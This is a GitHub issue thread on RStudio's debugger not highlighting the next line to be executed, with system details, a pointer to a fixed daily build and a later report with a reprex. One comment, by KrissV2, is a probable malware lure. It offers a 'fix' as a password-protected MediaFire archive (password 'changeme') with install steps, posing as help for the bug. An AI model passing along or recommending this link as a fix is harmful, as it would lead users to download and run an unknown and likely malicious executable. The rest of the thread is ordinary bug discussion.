### ISSUE TITLE
While stepping through the code, debugger doesn't highlight the next line in the editor

### ISSUE THREAD

**Issue by fantauzzi** [rstudio/rstudio#15108]
### System details

    RStudio Edition : Desktop
    RStudio Version : 2024.04.2 Build 764
    OS Version      :  Ubuntu 24.04.1
    R Version       :  4.4.1 (2024-06-14)

### Steps to reproduce the problem

- Set a breakpoint in an R script
- Run the script hitting on "Source"
- The script runs to the breakpoint and stops there

### Describe the problem in detail

The next line in the script to be executed is not highlighted in any way in the editor. To find it I must look at the console, and see what is the next line number to be executed, and find it in the editor.

See screenshot here. Note here I was using the Cobalt theme for the text editor; however, the same issue happens also when using the default theme:

![image](https://github.com/user-attachments/assets/b3fda934-cdb9-4dbb-b8aa-fc442b113105)

Occasionally, highlighting of the next line resumes working, while I step through the code with the debugger (I can't tell under what circumstances). But the issue is reproduced again at the next run.

### Describe the behavior you expected

The next line in the script to be executed, while execution is paused because of a breakpoint, is constantly highlighted, such that I can find it at a glance, instead of having to check the console to find the line number or the line source code.

Based on the [documentation](https://support.posit.co/hc/en-us/articles/205612627-Debugging-with-the-RStudio-IDE), the next line up for execution should be highlighted (in yellow). Also see documentation screenshot:

![image](https://github.com/user-attachments/assets/d5e988e1-2de6-4d15-8875-d7ce88dabda0)

- [x ] I have read the guide for [submitting good bug reports](https://github.com/rstudio/rstudio/wiki/Writing-Good-Bug-Reports).
- [ x] I have installed the latest version of RStudio, and confirmed that the issue still persists.
- [ N/A] If I am reporting an RStudio crash, I have included a [diagnostics report](https://support.posit.co/hc/en-us/articles/200321257-Running-a-Diagnostics-Report).
- [ x] I have done my best to include a minimal, self-contained set of instructions for consistently reproducing the issue.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by olivroy** [comment]
this may have been addressed as part of https://github.com/rstudio/rstudio/issues/15072. You may want to try the 2024.10 daily at https://dailies.rstudio.com/rstudio/kousa-dogwood/ (dev version)

**Comment by fantauzzi** [comment]
> this may have been addressed as part of #15072. You may want to try the 2024.10 daily at https://dailies.rstudio.com/rstudio/kousa-dogwood/ (dev version)

I have tried the daily (for Ubuntu 24.04), and couldn't reproduce the issue anymore.

**Comment by NikKrieger** [comment]
I have this issue. Lines of code are not highlighted. There is also a warning banner stating "⚠️Debug location is approximate because the source is not available."

## Reprex
```
debugonce(lm)
lm(mpg ~ disp + drat, data = mtcars)
```
![Image](https://github.com/user-attachments/assets/b33a8d23-5318-4d6d-b976-be4a192e0508)


## `sessionInfo()`
```
R version 4.5.0 (2025-04-11 ucrt)
Platform: x86_64-w64-mingw32/x64
Running under: Windows 10 x64 (build 19045)

Matrix products: default
  LAPACK version 3.12.1

locale:
[1] LC_COLLATE=English_United States.utf8  LC_CTYPE=English_United States.utf8   
[3] LC_MONETARY=English_United States.utf8 LC_NUMERIC=C                          
[5] LC_TIME=English_United States.utf8    

time zone: America/New_York
tzcode source: internal

attached base packages:
[1] stats     graphics  grDevices utils     datasets  methods   base     

loaded via a namespace (and not attached):
[1] compiler_4.5.0    Matrix_1.7-3      tools_4.5.0       TMB_1.9.17       
[5] rstudioapi_0.17.1 grid_4.5.0        lattice_0.22-6   
```

**Comment by kevinushey** [comment]
@NikKrieger can you confirm that you're using the latest release of RStudio?

**Comment by NikKrieger** [comment]
> [@NikKrieger](https://github.com/NikKrieger) can you confirm that you're using the latest release of RStudio?

Yes, I am indeed.

![Image](https://github.com/user-attachments/assets/6ef972c0-4131-4994-a451-7c2dfac5681e)
